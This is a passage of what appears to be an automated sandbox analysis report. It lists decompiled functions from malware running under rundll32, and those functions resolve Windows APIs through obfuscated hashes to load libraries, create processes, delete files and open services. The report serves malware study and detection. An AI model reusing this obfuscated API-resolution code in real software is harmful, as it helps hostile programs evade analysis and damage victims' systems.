				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E001C07A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}

APIs

LoadLibraryW.KERNEL32(0033A3B7), ref: 001B1096

Strings

[, xrefs: 001B103B

Memory Dump Source

Source File: 0000000D.00000002.2121760438.00000000001B1000.00000020.00000001.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000D.00000002.2121753529.00000000001B0000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2121787261.00000000001CC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1b0000_rundll32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: [
API String ID: 1029625771-3431493590
Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction ID: 478305541f17ea960f27408f27b120a6598dfb591520c8eb493791fb93af5927
Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction Fuzzy Hash: E8015BB6D01308FBDF04DF94C94AADEBBB1AB54318F108188E41466291D3B19B649B91

Uniqueness

Uniqueness Score: -1.00%

Function 001B4859, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E001B4859() {
				signed int _v8;
				signed int _v12;
				void* _t22;

				_v12 = 0xafe2;
				_v12 = _v12 * 0x42;
				_v12 = _v12 + 0xffffdd89;
				_v12 = _v12 ^ 0x002d198d;
				_v8 = 0x5b09;
				_v8 = _v8 | 0xa1ea9544;
				_v8 = _v8 * 0x12;
				_v8 = _v8 ^ 0x6283d9c1;
				E001C07A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
				ExitProcess(0);
			}

0x001b485e
0x001b487a
0x001b487d
0x001b4884
0x001b488b
0x001b4892
0x001b489d
0x001b48a0
0x001b48ad
0x001b48b7

APIs

ExitProcess.KERNELBASE(00000000), ref: 001B48B7

Strings

[, xrefs: 001B488B

Memory Dump Source

Source File: 0000000D.00000002.2121760438.00000000001B1000.00000020.00000001.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000D.00000002.2121753529.00000000001B0000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2121787261.00000000001CC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1b0000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: [
API String ID: 621844428-1822564810
Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction ID: 00904b64e157f3b053c7fc5c284fe6015112767b80c40a4adc05144c8812648e
Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction Fuzzy Hash: D7F017B0A05309FBDB08CFE8CA56A9EBFB9EB40301F20818CE444B7290E3B15F509B50

Uniqueness

Uniqueness Score: -1.00%

Function 001C4F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 66%

			E001C4F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E001B602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E001C07A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}

0x001c4f80
0x001c4f81
0x001c4f82
0x001c4f86
0x001c4f87
0x001c4f8c
0x001c4fa5
0x001c4fa8
0x001c4faf
0x001c4fb6
0x001c4fc7
0x001c4fca
0x001c4fd7
0x001c4fe2
0x001c4fe7

APIs

CloseHandle.KERNELBASE(003E66D8), ref: 001C4FE2

Strings

{#lm, xrefs: 001C4FC2

Memory Dump Source

Source File: 0000000D.00000002.2121760438.00000000001B1000.00000020.00000001.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000D.00000002.2121753529.00000000001B0000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2121787261.00000000001CC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1b0000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: {#lm
API String ID: 2962429428-1564096886
Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction ID: f8de56d074b08df0fb15d029ed067210aaec12f1cc8b3bae4c83b15ebcb1d7b8
Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction Fuzzy Hash: F5F037B081120CFFDB08EFA4D94289EBFBAEB54300F20819DE804AB250D3715B509B50

Uniqueness

Uniqueness Score: -1.00%

Function 001C976F, Relevance: 1.6, APIs: 1, Instructions: 63
processCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E001C976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
				unsigned int _v8;
				signed int _v12;
				void* _t34;
				int _t39;
				struct _PROCESS_INFORMATION* _t48;

				_push(__ecx);
				_push(__ecx);
				_t48 = __edx;
				_push(0);
				_push(_a68);
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001B602B(_t34);
				_v12 = 0xaff9;
				_v12 = _v12 | 0xcee54bd1;
				_v12 = _v12 + 0x6ed6;
				_v12 = _v12 ^ 0xcee61221;
				_v8 = 0x6229;
				_v8 = _v8 ^ 0x42aa9f31;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x10aad83f;
				E001C07A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
				return _t39;
			}

APIs

CreateProcessW.KERNEL32(001B591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,001B591A), ref: 001C9816

Memory Dump Source

Source File: 0000000D.00000002.2121760438.00000000001B1000.00000020.00000001.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000D.00000002.2121753529.00000000001B0000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2121787261.00000000001CC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1b0000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction ID: 814181e527a123c9a8c8c1a76b9dd5d193f68a882cb2efb8b2734a66dab9dca6
Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction Fuzzy Hash: 6411B372901148FBDF1A9FD6DC0ACDF7F7AEF99750F104148FA1556120D2768A60EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001BB566, Relevance: 1.6, APIs: 1, Instructions: 55
fileCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E001BB566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E001B602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E001C07A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}

APIs

CreateFileW.KERNELBASE(001C0668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,001C0668,?,?,?,?), ref: 001BB5FD

Memory Dump Source

Source File: 0000000D.00000002.2121760438.00000000001B1000.00000020.00000001.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000D.00000002.2121753529.00000000001B0000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2121787261.00000000001CC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1b0000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction ID: 6725fcf7fbb50ce5bd6aab8df551017077bf3fc56c41ae3334ad3b925e957fcd
Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction Fuzzy Hash: F611BF72801248BBDF16DF95DD06CEE7FBAEF99314F148198FA1862120D3729A60EB50

Uniqueness

Uniqueness Score: -1.00%

Function 001C981E, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E001C981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001B602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E001C07A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}

APIs

RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,001B87F2,0000CAAE,0000510C,AD82F196), ref: 001C989B

Memory Dump Source

Source File: 0000000D.00000002.2121760438.00000000001B1000.00000020.00000001.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000D.00000002.2121753529.00000000001B0000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2121787261.00000000001CC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1b0000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction ID: 91343e7afc06622a3fa6959c9da9b115f1d129389da1fba3ab650883ec2038cc
Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction Fuzzy Hash: CC018872801208FBDB08EFD5D846CDFBF79EF95310F10818CF908A6220E6719A619BA0

Uniqueness

Uniqueness Score: -1.00%

Function 001C7BF4, Relevance: 1.5, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E001C7BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				int _t31;
				signed int _t33;
				struct _SHFILEOPSTRUCTW* _t40;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_t40 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001B602B(_t24);
				_v8 = 0xa117;
				_t33 = 0x76;
				_v8 = _v8 / _t33;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x210fe703;
				_v8 = _v8 ^ 0x210fdcea;
				_v12 = 0xf1e9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x01e3a445;
				E001C07A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
				_t31 = SHFileOperationW(_t40); // executed
				return _t31;
			}

APIs

SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 001C7C67

Memory Dump Source

Source File: 0000000D.00000002.2121760438.00000000001B1000.00000020.00000001.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000D.00000002.2121753529.00000000001B0000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2121787261.00000000001CC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1b0000_rundll32.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction ID: 6caadd193399ce78e7f5a8cc4e138f1ea36a306b792c23a7f040c1bb7b532d4c
Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction Fuzzy Hash: B7014BB190120CFFEB09DFA4C84A9DEBBB9EF54314F208198F405A7240EBB19F509B91

Uniqueness

Uniqueness Score: -1.00%

Function 001BF65F, Relevance: 1.5, APIs: 1, Instructions: 40
serviceCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E001BF65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				int _t35;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t35 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001B602B(_t24);
				_v12 = 0xd5a7;
				_v12 = _v12 ^ 0x994cba9d;
				_v12 = _v12 ^ 0x994c19d3;
				_v8 = 0xac88;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xebed;
				_v8 = _v8 ^ 0x0000ab82;
				E001C07A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
				return _t29;
			}

APIs

OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 001BF6D8

Memory Dump Source

Source File: 0000000D.00000002.2121760438.00000000001B1000.00000020.00000001.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000D.00000002.2121753529.00000000001B0000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2121787261.00000000001CC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1b0000_rundll32.jbxd

Yara matches

Similarity

API ID: OpenService
String ID:
API String ID: 3098006287-0
Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction ID: 0aa635a33969d0bb15146abc9de0b9e751b2c0cdb7da03f56719894e13192673
Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction Fuzzy Hash: 2901E5B6901208BBEF05AF94DC068DF7F75EB15324F148188F90462250D7B25E61DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 001BB6DD, Relevance: 1.5, APIs: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E001BB6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				void* _t23;
				intOrPtr* _t27;
				void* _t28;

				E001B602B(_t23);
				_v12 = 0x9431;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0000160f;
				_v8 = 0xc972;
				_v8 = _v8 ^ 0x829e0126;
				_v8 = _v8 + 0x4512;
				_v8 = _v8 + 0xffff18f9;
				_v8 = _v8 ^ 0x829e24c1;
				_t27 = E001C07A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
				return _t28;
			}

0x001bb6f3
0x001bb6f8
0x001bb702
0x001bb70b
0x001bb712
0x001bb719
0x001bb720
0x001bb727
0x001bb72e
0x001bb747
0x001bb759
0x001bb75e

APIs

SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 001BB759

Memory Dump Source

Source File: 0000000D.00000002.2121760438.00000000001B1000.00000020.00000001.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000D.00000002.2121753529.00000000001B0000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2121787261.00000000001CC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1b0000_rundll32.jbxd

Yara matches

Similarity

API ID: FileHandleInformation
String ID:
API String ID: 3935143524-0
Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction ID: 92b3a87ebfcb90482349c4c08848fb740351d06fc1b64c4268234279f969f6d6
Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction Fuzzy Hash: 9E0128B6941308FBEB45DF94DD06E9E7BB5EB18704F108188FA09661A0D3B25A20AB61

Uniqueness

Uniqueness Score: -1.00%

Function 001CAA3C, Relevance: 1.5, APIs: 1, Instructions: 34
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E001CAA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001B602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E001C07A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}

0x001caa3f
0x001caa40
0x001caa41
0x001caa44
0x001caa47
0x001caa4b
0x001caa4c
0x001caa51
0x001caa5b
0x001caa64
0x001caa68
0x001caa6f
0x001caa76
0x001caa8d
0x001caa90
0x001caa9d
0x001caaa8
0x001caaad

APIs

DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 001CAAA8

Memory Dump Source

Source File: 0000000D.00000002.2121760438.00000000001B1000.00000020.00000001.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000D.00000002.2121753529.00000000001B0000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2121787261.00000000001CC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1b0000_rundll32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction ID: 033fe6d405475f3929599029d466b4aa154e068d6064d85cd0ac8b976b3bca9e
Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction Fuzzy Hash: 30F069B190020CFFDF08EF94DD4A99EBFB4EB54304F10808CF805A6250D3B69B549B50

Uniqueness

Uniqueness Score: -1.00%

Function 001B5FB2, Relevance: 1.5, APIs: 1, Instructions: 33
serviceCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E001B5FB2(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E001B602B(_t21);
				_v12 = 0x33d;
				_v12 = _v12 + 0xc3dc;
				_v12 = _v12 | 0x39ccfb02;
				_v12 = _v12 ^ 0x39ccf342;
				_v8 = 0xe8d9;
				_v8 = _v8 * 0x16;
				_v8 = _v8 | 0x4145347f;
				_v8 = _v8 ^ 0x9035ef96;
				_v8 = _v8 ^ 0xd1609914;
				E001C07A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
				_t27 = CloseServiceHandle(_a4); // executed
				return _t27;
			}

0x001b5fb5
0x001b5fb6
0x001b5fb7
0x001b5fbb
0x001b5fbc
0x001b5fc1
0x001b5fcb
0x001b5fd7
0x001b5fde
0x001b5fe5
0x001b5ffc
0x001b5fff
0x001b6006
0x001b600d
0x001b601a
0x001b6025
0x001b602a

APIs

CloseServiceHandle.ADVAPI32(39CCF342), ref: 001B6025

Memory Dump Source

Source File: 0000000D.00000002.2121760438.00000000001B1000.00000020.00000001.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000D.00000002.2121753529.00000000001B0000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2121787261.00000000001CC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1b0000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID:
API String ID: 1725840886-0
Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction ID: 33aca1f4dfae311a7e4b0805b1e5eafa30bce6370b8de9c4ff09beaaa06defa9
Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction Fuzzy Hash: 6AF03CB0811208FFDB08DFA0E94689EBFB8EB50300F20819CE409A7260E7719F559F54

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 3068 Parent PID: 2836 rundll32.exeCOMMON

Executed Functions

Function 00162959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 62%

			E00162959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E0016602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E001707A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}

0x0016295f
0x00162964
0x00162967
0x0016296a
0x0016296d
0x0016296e
0x0016296f
0x00162977
0x00162985
0x0016298a
0x00162992
0x0016299a
0x001629a2
0x001629a9
0x001629b0
0x001629b7
0x001629bb
0x001629cf
0x001629dc
0x001629e2

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 001629DC

Strings

<^, xrefs: 00162977

Memory Dump Source

Source File: 0000000E.00000002.2124437516.0000000000161000.00000020.00000001.sdmp, Offset: 00160000, based on PE: true

Associated: 0000000E.00000002.2124394242.0000000000160000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2124512066.000000000017C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_160000_rundll32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID: <^
API String ID: 1889721586-3203995635
Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction ID: 4964dba9cfed50ddeb35f7c3d21c5dbc59b24b891c4cb0585770eeb53b9cb259
Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction Fuzzy Hash: C5018072A00208BFEB18DF95DC0A8DFBFB6EF48310F108098F508A6250D7B65F619B91

Uniqueness

Uniqueness Score: -1.00%

Function 0016C6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E0016C6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E0016602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E001707A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}

0x0016c6e1
0x0016c6e6
0x0016c6f0
0x0016c6fc
0x0016c703
0x0016c706
0x0016c70d
0x0016c711
0x0016c715
0x0016c71c
0x0016c723
0x0016c72a
0x0016c731
0x0016c738
0x0016c751
0x0016c762
0x0016c768

APIs

SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 0016C762

Strings

/O, xrefs: 0016C6E6

Memory Dump Source

Source File: 0000000E.00000002.2124437516.0000000000161000.00000020.00000001.sdmp, Offset: 00160000, based on PE: true

Associated: 0000000E.00000002.2124394242.0000000000160000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2124512066.000000000017C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_160000_rundll32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID: /O
API String ID: 1514166925-1923427199
Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction ID: 9572c3e176fdfa3d2949013e371fd407e4d6e1cfc3f959e30b80a1110f714135
Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction Fuzzy Hash: 041133B290122DBBCB25DF94DC498DFBFB8EF14714F108188F90962210D3714B659BE0

Uniqueness

Uniqueness Score: -1.00%

Function 00161000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00161000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E0016602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E001707A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}

0x00161006
0x00161009
0x0016100c
0x00161011
0x00161016
0x0016101d
